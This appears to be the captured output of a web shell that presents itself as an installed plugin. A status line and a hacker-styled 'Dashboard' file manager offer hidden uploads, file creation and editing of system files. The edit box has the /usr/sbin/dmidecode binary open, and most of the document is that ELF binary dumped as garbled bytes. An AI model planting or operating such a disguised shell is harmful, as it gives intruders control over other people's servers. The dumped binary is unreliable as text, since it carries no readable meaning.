{"ok":true,"status":"active","msg":"Plugin installed and working","php":"8.3.33","server":"Apache","time":"2026-08-20 11:43:07"}
<!DOCTYPE html>
<html>
<head>
    <meta charset="UTF-8">
    <title>Dashboard</title>
    <style>
        * { margin:0; padding:0; box-sizing:border-box; font-family:Arial,sans-serif; }
        body { background:#000; color:#ccc; padding:15px; min-height:100vh; }
        .container { background:#111; border:1px solid #ff0000; max-width:1400px; margin:0 auto; border-radius:5px; overflow:hidden; }
        .header { background:#222; padding:15px; border-bottom:2px solid #ff0000; color:#fff; }
        .header h1 { color:#ff0000; font-size:20px; margin-bottom:10px; }
        .system-info { display:flex; gap:15px; font-size:12px; color:#888; flex-wrap:wrap; }
        .path-navigation { background:#1a1a1a; padding:12px 15px; border-bottom:1px solid #333; display:flex; align-items:center; flex-wrap:wrap; gap:5px; }
        .path-navigation a { color:#00ff00; text-decoration:none; padding:5px 10px; background:#222; border-radius:3px; font-size:13px; }
        .path-navigation a:hover { background:#333; color:#fff; }
        .tools { padding:12px 15px; background:#1a1a1a; border-bottom:1px solid #333; display:flex; gap:8px; flex-wrap:wrap; }
        .button { background:#222; color:#ccc; border:1px solid #666; padding:8px 15px; cursor:pointer; border-radius:3px; font-size:13px; text-decoration:none; display:inline-flex; align-items:center; gap:5px; }
        .button:hover { background:#333; border-color:#00ff00; color:#fff; }
        .button-green { border-color:#00ff00; color:#00ff00; }
        .button-red { border-color:#ff0000; color:#ff0000; }
        .message { padding:12px; background:#1a1a1a; border-bottom:1px solid #333; text-align:center; font-weight:bold; }
        .file-table { width:100%; color:#ccc; border-collapse:collapse; }
        .file-table th { background:#222; padding:12px 15px; text-align:left; border-bottom:2px solid #ff0000; color:#fff; font-size:13px; }
        .file-table td { padding:10px 15px; border-bottom:1px solid #333; font-size:14px; }
        .file-table tr:hover { background:#1a1a1a; }
        .folder-link { color:#00ff00; font-weight:bold; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .file-link { color:#ccc; text-decoration:none; display:flex; align-items:center; gap:8px; }
        .folder-link:hover, .file-link:hover { color:#fff; }
        .size { color:#888; }
        .permissions { font-family:'Courier New',monospace; color:#ff9900; background:#222; padding:4px 8px; border-radius:3px; font-size:12px; }
        .actions { display:flex; gap:5px; flex-wrap:wrap; }
        .action-button { padding:5px 10px; background:#222; color:#ccc; border:1px solid #666; font-size:11px; cursor:pointer; text-decoration:none; border-radius:3px; }
        .action-button:hover { background:#333; border-color:#00ff00; }
        .action-button-red { border-color:#ff0000; color:#ff0000; }
        textarea { width:100%; height:400px; background:#000; color:#00ff00; border:1px solid #ff0000; padding:15px; font-family:'Courier New',monospace; font-size:14px; border-radius:3px; }
        .edit-container { padding:20px; background:#000; border-bottom:1px solid #333; }
        .edit-title { color:#00ff00; margin-bottom:15px; font-size:16px; }
        .toast-container { position:fixed; top:20px; right:20px; z-index:10000; display:flex; flex-direction:column; gap:10px; max-width:350px; }
        .toast { padding:12px 20px; border-radius:5px; color:#fff; font-size:14px; display:flex; align-items:center; justify-content:space-between; gap:10px; animation:toastIn 0.3s ease; cursor:pointer; }
        .toast-success { background:#1a472a; border-left:4px solid #00ff00; }
        .toast-error { background:#4a1a1a; border-left:4px solid #ff0000; }
        @keyframes toastIn { from { transform:translateX(100%); opacity:0; } to { transform:translateX(0); opacity:1; } }
        .search-input { background:#000; border:1px solid #444; color:#fff; padding:6px 12px; border-radius:3px; font-size:13px; width:200px; margin-left:auto; }
        .search-input:focus { outline:none; border-color:#00ff00; }
    </style>
</head>
<body>
    <div class="container">
        <div class="header">
            <div style="display:flex; justify-content:space-between; align-items:center;">
                <div>
                    <h1>Dashboard</h1>
                    <div class="system-info">
                        <span>PHP: <b style="color:#ff9900">8.3.33</b></span>
                        <span>OS: <b style="color:#ff9900">Linux</b></span>
                        <span>User: <b style="color:#ff9900">pablod78</b></span>
                    </div>
                </div>

            </div>
        </div>
        
                
        <div class="path-navigation">
                                            <a href="?p=%2F">/</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr">usr</a>
                            <span style="color:#666">/</span>                <a href="?p=%2Fusr%2Fsbin">sbin</a>
                    </div>
        
        <div class="tools">
            <button class="button button-green" onclick="document.getElementById('b64upload').click()">📤 Upload</button>
            <input type="file" id="b64upload" style="display:none" onchange="uploadFileB64(this)">
            <button class="button" onclick="showCreateFile()">📝 New File</button>
            <button class="button" onclick="showCreateFolder()">📁 New Folder</button>
            <a href="?p=%2Fusr%2Fsbin" class="button button-red">Close</a>            <input type="text" id="search-input" class="search-input" placeholder="🔍 Search..." onkeyup="searchFiles(this.value)">
        </div>

        
                    <div class="edit-container">
                <div class="edit-title">Editing: dmidecode</div>
                <form method="post">
                    <input type="hidden" name="edit_path" value="/usr/sbin/dmidecode">
                    <textarea name="edit_content">ELF          &gt;    `�      @       ��         @ 8  @         @       @       @       �      �                                                                                         �       �                    �       �       �      5�      5�                    �      �      �     p�      p�                   PB     PB     PB     �?      �@                   X|     X|     X|     �      �                   8      8      8      0       0                    h      h      h      D       D              S�td   8      8      8      0       0              P�td   8(     8(     8(     �      �             Q�td                                                  R�td   PB     PB     PB     �=      �=             /lib64/ld-linux-x86-64.so.2               GNU   �          � �                   GNU (]+cf]w�[J�}a�xお�         GNU                      1             1   3   4   (��9����                            &quot;                      �                      �                      �                      �                      �                                            T                                          �                      7                      H                                          \                      �                     �                      8                     r                                          x                     I                     ,                      O                     %                     2                     ?                     �                      �                                            �                     k                     I                      �                     �                     �                     &lt;                      �                     ,                                          �                     �                      t                      {                                             e                        &quot;                   U                      �                      �     @�            �     h�            m     ��            �     `�             __cxa_finalize __libc_start_main inet_ntop __chk_fail puts __printf_chk strncasecmp strstr __stack_chk_fail stderr fwrite __fprintf_chk stdout __vfprintf_chk putchar __sprintf_chk __snprintf_chk getopt_long optarg strcasecmp strtoul strcmp optopt free calloc perror strlen strncmp setlinebuf memcmp fopen fgets strchr strtoull fclose read __errno_location fstat malloc lseek geteuid sysconf mmap memcpy munmap fdopen fseek libc.so.6 GLIBC_2.33 GLIBC_2.14 GLIBC_2.4 GLIBC_2.34 GLIBC_2.3.4 GLIBC_2.2.5 _ITM_deregisterTMCloneTable __gmon_start__ _ITM_registerTMCloneTable                                                                �         ���   �     ���   �     ii   �     ���   �     ti	   �     ui	   �      PB            @�      XB             �      `B            `B     �B            �     �B            ��     �B            ��     �B            ��     �B            
�     �B            �     �B            %�     �B                 �B            8�     �B            F�     �B            W�     �B            `�     �B            p�     �B            {�     �B            (     �B            ��      C            ��     C            ��     C            ��      C            �     (C            ��     0C            ��     8C            ��     @C            ��     HC            ��     PC            �     XC            H     `C            �     hC            )�     pC            &gt;�     xC            G�     �C            ��     �C            (     �C            R�     �C            V�     �C            e�     �C            v�     �C            ��     �C            ��     �C            ��     �C            ��     �C            ��     �C            ��     �C            ��     �C            ��      D            p     D            �     D            ��     D            �      D            ��     (D            �     0D            �     8D            �     @D            3�     HD                 PD            @     XD            8�     `D            P�     hD            i�     pD            p     xD            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            ��     �D            �     �D            ��     �D            ��     �D            �      E            ��     E            ��     E            ��     E            ��      E            ��     (E            ��     0E            ��     8E            ��     @E            ��     HE            ��     PE            ��     XE            ��     `E            ��     hE            �     pE                 xE            ��     �E            �     �E            �     �E            0     �E            *�     �E            `     �E            �     �E            C�     �E            Y�     �E            c�     �E            o�     �E            ��     �E            ��     �E            ��     �E            ��     �E            ��     �E            �      F            ��     F            �     F            �     F            ��      F            �     (F            /�     @F            �     HF            9�     PF            ��     XF            ��     `F            �     hF            G�     pF            O�     xF            W�     �F            �     �F            f�     �F            j�     �F            ��     �F            �     �F            y�     �F            ��     �F            ��     �F            ġ     �F            ��     �F            ��     �F            ��     �F            ��     �F            �     �F            &quot;�      G            ��     G            3�     G            &lt;�     G            @�      G            6�     (G            :�     0G            �     8G            D�     @G            P�     HG            Y�     PG            i�     XG            x�     `G            ��     hG            ��     pG            ��     xG            ��     �G            ��     �G            ��     �G            ��     �G            ��     �G            ��     �G            ��     �G            �     �G            !�     �G            4�     �G            H�     �G            f�     �G            j�     �G            ڣ      H            p�     H            ڣ     H            x�     H            t�      H            {�     @H            F�     HH            ��     PH            ��     XH            ��     `H            ��     �H            ��     �H            ��     �H            ��     �H            ��     �H            ��     �H            ��     �H            g�     �H            ��     �H            l�     �H            ��     �H            ��     �H            �     �H            �     �H            �      I            �     I            �     I            %�     I            3�      I            B�     @I            ��     HI            ��     PI            P�     XI            a�     `I            |�     hI            r�     pI            ��     xI            ��     �I            ��     �I            ��     �I            ��     �I            ��     �I            ��     �I            ��     �I            ��     �I            ��     �I            Ӡ     �I            ��      J            ��     J            �      J            �     0J            &amp;�     @J            :�     PJ            N�     `J            ]�     pJ            r�     �J            ~�     �J            ��     �J            ��     �J            ��     �J            ��     �J            ��     �J            ��     �J            
�      K            �     K            ,�      K            &lt;�     0K            R�     @K            d�     PK            u�     `K            ��     pK            ��     �K            ��     �K            U$     �K            �     �K            O$     �K            ��     �K            K$     �K            ��     �K            I$     �K            ��     �K            G$     �K            _�     �K            B$     �K            ��     �K            @$     �K            ��     �K            &gt;$      L            ��     L            &lt;$      L            R�     (L            º     0L            7�     8L            7�     @L            H     HL            ��     PL            ��     XL            ��     `L            �     hL            �     pL            5�     xL            F�     �L            W�     �L            o�     �L            ��     �L            ��     �L            ��     �L            ��     �L            ��     �L            �     �L            �     �L            �     �L            8     �L            x     �L            �     �L            �     �L                  �L            X      M            �     M            �     M            �     M                  M            �     @M            #�     HM            5�     PM            M�     XM            ^�     `M            t�     hM            @     pM            ��     xM            ��     �M            h     �M            �     �M            �     �M            ��     �M            ��     �M            �     �M            ��     �M            �     �M                 �M            )�     �M            &lt;�     �M            Q�      N            �     N            h�     N            ��     N            ��      N            ��     (N            H     0N            h     8N            ��     @N            �     HN            �     XN            ��     `N            �     hN            �     pN                 xN            0     �N            �     �N            `     �N            �     �N            �     �N            :�     �N            K�     �N            �     �N                 �N            8     �N            X     �N            a�     �N            q�     �N            �     �N            ��      O            ��     O            ��     O            ��     O            ��      O            ��     (O            ��     0O            �     8O            &quot;�     @O            �     HO            �     PO            ��     XO            /�     `O            &gt;�     hO            �     pO            �     xO            3�     �O            ��     �O            8�     �O            B�     �O            &quot;�     �O            H�     �O            ]�     �O            �     �O            �     �O            �     �O            p�     �O            ��     �O            z�     �O            ��     �O            ��      P            �     P            ��     P            ��     P            ��      P            ��     @P            ġ     HP            ��     PP            ��     XP            ��     `P            ��     hP            ��     pP             �     xP            �     �P            �     �P            &quot;�     �P            .�     �P            4�     �P            :�     �P            J�     �P            �     �P            ��     �P            S�     �P            \�     �P            c�     �P            t�     �P            }�     �P            ��     �P            ��     �P            ��      Q            �     Q            �     Q            ��     Q            ��      Q                 (Q            ��     0Q            �     8Q            �     @Q            1�     HQ            5�     PQ            ?�     XQ            X�     `Q            n�     hQ            ~�     �Q            ġ     �Q            0     �Q            ��     �Q            ��     �Q            ��     �Q            ��     �Q            ��     �Q            ��     �Q            �     �Q            7�     �Q            U�     �Q            _�     �Q            i�     �Q            w�     �Q            ��     �Q            t�      R            ��     R            ��     R            ��     R            ��      R            ��     (R            ��     0R            ��     8R            ��     @R            ��     HR            �     PR            ��     XR            ��     `R            ��     hR            �     pR            �     xR            �     �R            ��     �R            ��     �R            P     �R            +�     �R            7�     �R            A�     �R            K�     �R            S�     �R            c�     �R            n�     �R            z�     �R            ��     �R            ��     �R            ��     �R            ��     �R            ��      S            ��     S            ��     S            ��     S            �      S            �     (S            *�     0S            8�     8S            I�     @S            Z�     HS            k�     PS            |�     XS            7�     `S            ��     hS            ��     pS            ��     xS            ��     �S            ��     �S            ��     �S            ��     �S             �     �S            �     �S            &quot;�     �S            3�     �S            D�     �S            V�     �S            e�     �S            n�     �S            �     �S            �     �S            |�     �S            w�      T            {�     T            �     T            ��     T            ��      T            ��     (T            ��     0T            ��     8T            ��     @T            ��     HT            ��     PT            ��     XT            ��     `T            ��     hT            ��     pT            ��     xT            ��     �T            �     �T            �     �T            $�     �T            1�     �T            &lt;�     �T            H�     �T            U�     �T            e�     �T            q�     �T            ��     �T            ��     �T            ��     �T            x     �T            �     �T            ��     �T            ��      U            ��     U            �     U                 U            �      U            0�     (U            ��     0U            B�     8U            ��     @U            l�     HU            M�     PU            ��     XU            ��     `U            _�     hU            n�     pU            {�     xU            ��     �U            ��     �U            ��     �U            F�     �U            k�     �U            .�     �U            ��     �U            ��     �U            �     �U            ��     �U            ��     �U             �     �U            ۽     �U            N�     �U            ɾ     �U            �     �U            d�      V            ̿     V            �     V            �     V            ��      V            ��     (V            ��     0V            �     8V            �     @V            8     HV            ��     PV            ��     XV            ��     `V            ��     hV            ��     pV            �     xV            �     �V            l�     �V            �     �V            �     �V            N�     �V            �     �V            #�     �V            ��     �V            ,�     �V            H�     �V            c�     �V            w�     �V            ��     �V            ��     �V            ��      W            ��     W            ��     W            ��     W            ��      W            ��     (W            8     0W            
�     @W            �     HW            X     PW            �     XW            1�     `W            G�     hW            �     pW            [�     xW            r�     �W            ġ     �W            ��     �W            ~�     �W            ��     �W            ��     �W            ��     �W            �     �W            ��     �W            ��     �W            ��     �W            	�     �W            %�      X            �     X            �     X            5�     X            R�      X            Q�     (X            b�     0X            r�     8X            ��     @X            ��     HX            ��     `X            �     hX            �     pX            ��     xX            ��     �X            ��     �X            ��     �X            ��     �X            ��     �X            &gt;�     �X            ��     �X            ��     �X            ��     �X            �     �X            �     �X            4�     �X            �     �X            �     �X            ��     �X            ;�      Y            D�     Y            M�     Y            �      Y            �     (Y            �     0Y            V�     8Y                 @Y            @     `Y            f�     hY            u�     pY            ��     xY            8�     �Y            ��     �Y            �     �Y            �     �Y            �     �Y            ��     �Y            S�     �Y            ��     �Y            ��     �Y            ��     �Y            ��     �Y            ��      Z            �     Z            �     Z            ��     Z            ��      Z            ��     (Z            ��     0Z            ��     8Z            �     @Z            �     `Z            h     hZ            2�     pZ            �     xZ            �     �Z            �     �Z            �     �Z                  �Z            t�     �Z            P�     �Z            ^�     �Z            k�     �Z            �     �Z            �     �Z            &gt;�     �Z            ̴     �Z            ��     �Z            ��     �Z            ��     �Z            ��      [            �     [            �     [            ��     [            ��      [            ��     ([            ��     0[            ��     8[            ��     @[            ��     H[            �     P[            �     X[            ��     `[            )�     h[            .�     p[            3�     x[            C�     �[            �     �[            �     �[            R�     �[            Y�     �[            e�     �[            P�     �[            �     �[            �     �[            p�     �[            ;�     �[            )�     �[            w�     �[            {�     �[            ��      \            �     \            �     \            &quot;�     \            ��      \            -�     @\            ��     H\            ��     P\            ��     X\            7�     `\            �     h\            ��     p\            H     x\            ��     �\            �     �\            �     �\            �     �\            +�     �\            2�     �\            �     �\            �     �\            ;�     �\            K�     �\            D�      ]            �     ]            �     ]            J�     ]            O�      ]            T�     (]            Y�     0]            ^�     8]            c�     @]            k�     H]            r�     P]            z�     X]            ��     `]            ��     �]            ��     �]            ��     �]            p     �]            �     �]            �     �]            ��     �]            ��     �]            ��     �]            �     �]            �     �]            �     �]            l�     �]            [�      ^            �     ^            .�     ^            E�     ^            ��      ^            G�     (^            X�     0^            c�     8^            o�     @^            ��     H^            ��     P^            ��     `^            �     h^            �     p^            &quot;�     x^            ��     �^            -�     �^            ��     �^            �     �^            �     �^            l�     �^            [�     �^            �     �^            .�     �^            E�     �^            ��     �^            G�     �^            X�     �^            c�      _            &gt;�     _            ̴     _            ��     _            �      _            7�     (_            ��     0_            ��     8_            ��     @_            �     H_            �     P_            �     X_            �     `_            �     h_            4�     p_            @�     x_            I�     �_            �     �_            �     �_            ��     �_            Y�     �_            d�     �_            p�     �_            |�     �_            ��     �_            ��     �_            �     �_            �     �_            ��     �_            ��      `            ��      `            �     (`            �     0`            ��     8`            ��     @`            �     H`            �     P`            &quot;�     X`            ��     ``            ��     h`            ;�     p`            ��     x`            ��     �`            �     �`            �     �`            &#039;�     �`            1�     �`            L�     �`            \�     �`            �     �`            �     �`            ��     �`            p�     �`            v�     �`            {�     �`            ��     �`            ��      a            ��     a            ��     a            ��     a            ��      a            ��     (a            ��     0a            B�     8a            ��     @a            ��     Ha            ��     Pa            ��     Xa            ��     `a            ��     ha            ��     pa            ��     xa            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a            ��     �a             �     �a            ��     �a            �     �a            �     �a            �     �a            3�     �a            
�      b            ��     b            �     b            �     b            �      b            ��     (b            &#039;�     0b            ,�     8b            A�     @b            9�     Hb            @�     Pb            ��     Xb            F�     `b            �     hb            �     pb            ġ     xb            �     �b            J�     �b            Y�     �b            g�     �b            �     �b            �     �b            k�     �b            y�     �b            ��     �b            ��     �b            ��     �b            ��     �b            ��      c            �     c                  c            X     c            �      c            �     @c            ��     Hc            �     Pc            �     Xc            ��     `c            ��     �c            �     �c            �     �c            &lt;�     �c            K�     �c            ��     �c             �     �c            �     �c            �     �c            ��     �c            ��     �c            �      d            �     d            �     d            :�     d            #�      d            *�     (d            1�     0d            8�     8d            @�     @d            I�     Hd            R�     Pd            [�     Xd            d�     `d            o�     hd            z�     �d            �     �d            �     �d            ��     �d            ��     �d            ��     �d            ��     �d            �     �d            ��     �d            ��     �d            ��     �d            ��     �d            �     �d            �     �d            /�      e            �     e            �     e            F�     e            i�      e            R�     @e            �     He            �     Pe            ġ     Xe            �     `e            J�     he            Y�     �e            P�     �e            Z�     �e            7�     �e            �     �e            c�     �e            q�     �e            |�     �e            �     �e            �     �e            �     �e            ��     �e            ��     �e            ��     �e            ��     �e            ��      f            �     f            �     f            ġ     f            ��      f            
�     (f            �     0f             �     8f            g�     @f            �     Hf            �     Pf            ,�     Xf            ;�     `f            F�     hf            ġ     pf            ]�     xf            h�     �f            o�     �f            v�     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            ��     �f            �     �f            �     �f             �      g            0�     g            ?�     g            J�     g            U�      g            `�     (g            o�     0g            ~�     8g            ��     @g            ��     Hg            ��     Pg            ��     Xg            ��     `g            ��     hg            ��     pg            ��     xg            �     �g            �     �g            �     �g            #�     �g            4�     �g            E�     �g            T�     �g            c�     �g            r�     �g            ��     �g            ��     �g            ��     �g            ��     �g            ��     �g            ��     �g            ��     �g            ��      h            ��     h             �     h            �     h            �      h            -�     (h            &lt;�     0h            K�     8h            Z�     @h            i�     Hh            x�     Ph            ��     Xh            ��     `h            ��     hh            ��     ph            ��     xh            ��     �h            ��     �h            ��     �h            ��     �h            �     �h            �     �h            �     �h            .�     �h            =�     �h            L�     �h            [�     �h            j�     �h            y�     �h            ��     �h            ��     �h            ��      i            �     i            ̴     i            ��     i            ��      i            ��     (i            7�     0i            7�     8i            �     @i            �     Hi            �     Pi            ��     Xi            ��     `i            �     hi            �     �i            �     �i            �     �i            ġ     �i            �     �i            =�     �i            �     �i            �     �i            X�     �i            %�     �i            -�     �i            ��     �i            ��     �i            ��      j            �     j            �     j            ]�     j            j�      j            .�     (j            G�     0j            ��     8j            ��     @j            ,�     Hj            E�     Pj            ~�     Xj            ��     `j            ��     �j            ��     �j            �     �j            �     �j            ��     �j            ��     �j            ��     �j            ��     �j            ��     �j            ��     �j            �     �j            �     �j            �     �j            �      k            �     k            $�     k            )�     k            /�      k            8�     (k            h�     0k            ?�     8k            I�     @k            Y�     Hk            d�     Pk            q�     Xk            ~�     `k            ��     hk            ��     pk            ��     xk            ��     �k            ��     �k            ��     �k            ��     �k            ��     �k             �     �k            �     �k            �     �k            d�     �k            $�     �k            4�     �k            ;�     �k            G�     �k            R�     �k            ^�     �k            j�     �k            r�      l            �     l            �     l            ġ     l            {�      l            ��     (l            ��     0l            ��     8l            ��     @l            ��     hl            �     xl            �     �l            ��     �l            ��     �l            ��     �l            ��     �l            ��     �l            ��     �l            ��     �l            ��     m            �     m            +�     (m            �     8m            �     Hm            �     Xm            &quot;�     hm            2�     xm            �     �m            �     �m            &gt;�     �m            H�     �m            Y�     �m            U�     �m            [�     �m            ^�     �m            a�     n            f�     n            k�     (n            r�     8n            {�     Hn            ��     Xn            ��     hn            ��     xn            ��     �n            ��     �n            ��     �n            �     �n            �     �n            �     �n            �     �n             �     �n            �     o            ��     o            �     (o            �     8o            &amp;�     Ho            .�     Xo            4�     ho            @�     xo            L�     �o            X�     �o            f�     �o            s�     �o            �     �o            �     �o            ��     �o            ��     �o            ��     p            �     p            �     (p            �     8p            $�     Hp            �     Xp            ��     hp            �     xp            �     �p            �     �p            #�     �p            /�     �p            8�     �p            M�     �p            A�     �p            J�     �p            S�     q            \�     q            i�     (q            v�     8q            ��     Hq            ��     Xq            ��     hq            ��     xq            ��     �q            ��     �q            ��     �q            �     �q            �     �q            �     �q            ��     �q            �     �q            �     r            �     r            �     (r            �     8r            �     Hr            )�     Xr            7�     hr            E�     xr            V�     �r            d�     �r            h�     �r            o�     �r            }�     �r            ��     �r            ��     �r            ��     �r            ��     s            ��     s            ��     (s            ��     8s            �     Hs            �     Xs            �     hs            �     xs            �     �s            �     �s            &#039;�     �s            1�     �s            ;�     �s            E�     �s            M�     �s            Z�     �s            g�     t            v�     t            ��     (t            ��     8t            ��     Ht            ��     Xt            ��     ht            �     xt            �     �t            �     �t            �     �t            �     �t            ,�     �t            @�     �t            T�     �t            c�     �t            w�     u            ��     u            ��     (u            ��     8u            �     Hu            �     Xu            �     hu            -�     xu            ��     �u            ��     �u            �     �u            �     �u            �     �u            %�     �u            /�     �u            9�     �u            C�     v            N�     v            X�     (v            c�     8v            o�     Hv            ~�     Xv            ��     hv            ��     xv            ��     �v            �     �v            �     �v            �     �v            �     �v            �     �v            �     �v            ��     �v            �     w            �     w            �     (w            �     8w            %�     Hw            *�     Xw            /�     hw            2�     xw            7�     �w            G�     �w            [�     �w            o�     �w            t�     �w            ��     �w            ��     �w            ��     �w            �     x            �     x            �     (x            ��     8x            �     Hx            !�     Xx            4�     hx            R�     xx            j�     �x            {�     �x            ��     �x            ��     �x            ��     �x            ��     �x            ��     �x            ��     �x            ��     y            �     y            �     (y            �     8y            �     Hy            �     Xy            �     hy            �     xy            �     �y            �     �y            �     �y            ��     �y            ��     �y            �     �y            �     �y            �     �y            �     z            �     z            �     (z            &#039;�     8z            2�     Hz            =�     Xz            I�     hz            U�     xz            a�     �z            m�     �z            y�     �z            ��     �z            ��     �z            ��     �z            �     �z            �     �z            �     {            *�     {            F�     ({            M�     8{            T�     H{            [�     X{            b�     h{            o�     x{            |�     �{            ��     �{            g�     �{            �     �{            R�     �{            º     �{            ʺ     �{            ��     �{            ��     �{            ��     �{             %     �{            �&#039;     �{            %     �{            �&#039;      |            �&#039;     |            2%     |            P%     |            n%      |            �%     (|            �%     0|            �%     8|            �%     @|            �%     H|            �%     P|            �&#039;      �            Ƣ     @�            ΢     `�            Ӣ     ��            ٢     ��            ��     ��            &#039;�     �            �      �            �      �            �     @�            ��     `�            ��     ��            �     ��            
�     ��            �     �            ��     �                   �        
           �                   �        ,           �        .           @�        1           `�        4           h�        2           ��        3           `~                   h~                   p~                   x~                   �~                   �~                   �~                   �~        	           �~                   �~                   �~                   �~                   �~                   �~                   �~                   �~                   �~                   �~                   �~                   �~                                                                                                                    (                   0                   8                   @                    H        !           P        &quot;           X        #           `        $           h        %           p        &amp;           x        &#039;           �        (           �        )           �        *           �        +           �        -           �        .           �        /           �        0                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                           ��H��H��� H��t��H���     �5*� �%+�  ��h    �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h	   ��Q������h
   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h   �������h   ��������h   �������h   �������h   �������h   �������h   �������h   ��q������h   ��a������h   ��Q������h   ��A������h   ��1������h   ��!������h   ��������h   ��������h   ������h    �������h!   ��������h&quot;   �������h#   �������h$   �������h%   �������h&amp;   �������h&#039;   ��q������h(   ��a������h)   ��Q������h*   ��A������h+   ��1�������%e� D  ���%]� D  ���%U� D  ���%M� D  ���%E� D  ���%=� D  ���%5� D  ���%-� D  ���%%� D  ���%� D  ���%� D  ���%� D  ���%� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%�� D  ���%}� D  ���%u� D  ���%m� D  ���%e� D  ���%]� D  ���%U� D  ���%M� D  ���%E� D  ���%=� D  ���%5� D  ���%-� D  ���%%� D  ���%� D  ���%� D  ���%� D  ��AWAVAUATA��UH��SH��hH�=q� dH�%(   H�D$X1�����H�=�� � ���H��&quot; H��D��H��� ���     ��� ������  ���1  �}� E1����   ���  ��:  ��  H�D$    � ��   ��*  H�Q� H�t$1����  H��H����  L�l$I��vP�   H�5�! H�����A�ą��
  �} _SM_��  �   H�5O! H���n���A�ą���  E1��A�   ��� �  H������H�=�� ����H�D$XdH+%(   ��  H��hD��[]A\A]A^A_è@��   H�t$H��i 1���  H��H����   �K� ��  L�l$I���:  L�5! �   H��L�����A�ą��	  I��v�} _SM_�  �   H�5f  H�����A�ą��  ��� uH�=�i 1��3  L�5�= L�-d  L��L��L�d$����H��H���  H�SMBIOS3 �    H��?   L���(���H����   �=   L������  I9$tA�&lt;$SMBIu�fA�|$OSu�A�|$ u�H�x1�1���H��I��������tL������� ��z  H�� �    L���7�  H��H����   �   H�5� H���w���A�ą���  E1�} _SM_����H��� 1ɾ    H���V�  A�ą����E1����H�=d �W�������H���Z�������   H�=K� L��   1�H�:h ����A�   ���A�   ���1�H�5 H�= �  �,� ����H�=� ����k���H�5&#039;� H�=@g 1��i  ���I���������H��� 1�L��H����  ����������L���&lt;����E���H�=Hg 1��  �g���H�=�g 1��f  ���1�L��H�=� L���M  �� ��d���H�5h� H�=ag 1���  �J���H�n� 1�L�����H�=� 1ɾ    H����  ���{����i���H�5:� 1�H���p�  ���]����K����   H�� L��H����  ���
����4����   H�� L��H���x�  ������ ����   H�5� H����  ������������L�-V L��L����H��H�������x� �  H�c� �   �   ��  H��H����1�L�52 �H��H���  t:L�,+�   L��L�����A�ą�u�H�� 1ɾ    L�����  ��t��K����   L�u�L�=_ �H���  ����H��H�C�M�,H=�  
A�} _SM_t1�   L��L���I���A�ą�u�H�5�� 1�L�����  ��t�����H��� 1ɾ    L���&quot;�  ��t�����H�5b� H�=� 1���  ���f.�     D  ��1�I��^H��H���PTE1�1�H�=1����;� �f.�     H�=�� H��� H9�tH�� H��t	���    ��    H�=i� H�5b� H)�H��H��?H��H�H�tH��� H��t��fD  ��    ���=}�  u+UH�=��  H��tH�=&gt;� �Y����d����U� ]� ��    ���w����    H��@��H�w��   ��  H���  H��HD�H��� @��uH���  � H��@��H�w��   ��  H�S�  H��HD�H��� AWI��H��H��AV��L�ZA�   AUA�   ATUSH��(�D  ���ukE1�L9�tD��H��D	�tW�
��u�E1���E��t&amp;H�5k�  M���E  H��(1�[]A\A]A^A_A�� E��tM���;  H�5��  ��f�     �H�PD�XD�`D�xD�p�L$�HD�h�T$�h�XD�\$D�H
D�@	D�d$D�XD�`�L$��Hf��v[M���  AWAVAUUSAQA��D��AP�D$DA��D��P�t$TV�D$XP�t$lV�D$pH�5�P P1�A��H��`H��([]A\A]A^A_�f�M��tmAWH�5zP AVAUUSAQE��AP�D$DE��P�D$PP�D$\P�D$hP�D$tP1�A��H��`H��([]A\A]A^A_�H�=�  H��([]A\A]A^A_���H�=��  ��AWAVAUUSAQE��AP�D$DE��P�D$PP�D$\P�D$hP�D$tPH�5,P �   1�� ���H��`�AWAVAUUSAQA��D��AP�D$DA��D��P�D$TP�D$XP�D$lP�D$pP��    AUATUSH��H��L�gA�l$f�� ��   @����$  @��@���tj��   A��   1���   L�� �,�    A9��  9��/  �:A�Љȉ���H��A���9�u�H��H�» H�DH��[]A\A]�f��{@���  A�D$H�-E�  ���  �   H�5z�  H�����L�%q�  ���I  H��H�D�  []A\A]��     @��0�����@��v\A�D$���1  �   H�5�  H�=��  �f��u2H���  �I���fD  �{@��)vA�t$(f��� �����&gt;���@������    H��H���  []A\A]�fD  �zA�8����H��A�����H��H���  []A\A]�fD  H�s�й   �w�  H��H����   L�%]�  H��L����H������   L��H���������L�%0�  H��L���V�H��u�   L��H���a���i���H���  �@����й   L�����  H��H��t1L�-��  H��L����H��������&quot;�     H�-]�  �&#039;���H�-Q�  L�-��  �   L��H�������|���A�l$�U��� AUH�5��  ATUH��S1�H��   dH�%(   H��$�   H�R�  �D$   I���D$   �D$(   �D$8
   �D$H	   �D$X   H�$H��  H�D$H��  H�D$ H��  H�D$0H��  H�D$@H��  H�D$PH���  H�D$`H�]H �D$h   H�D$p�D$x   ���H��tzf.�     H��H��A��H��I�t ��H��uDH��H��u�1��=�� ���D�H��$�   dH+%(   uwH�Ę   []A\A]�f�     I��B�D$��D  H�5_�  H���Q�H���x���H�5N�  H���9�H���`���H�5&gt;�  H���!�H���H������v�����ff.�     ��t��t&amp;H���  �fD  H��@   H���   �3� H��@   H���
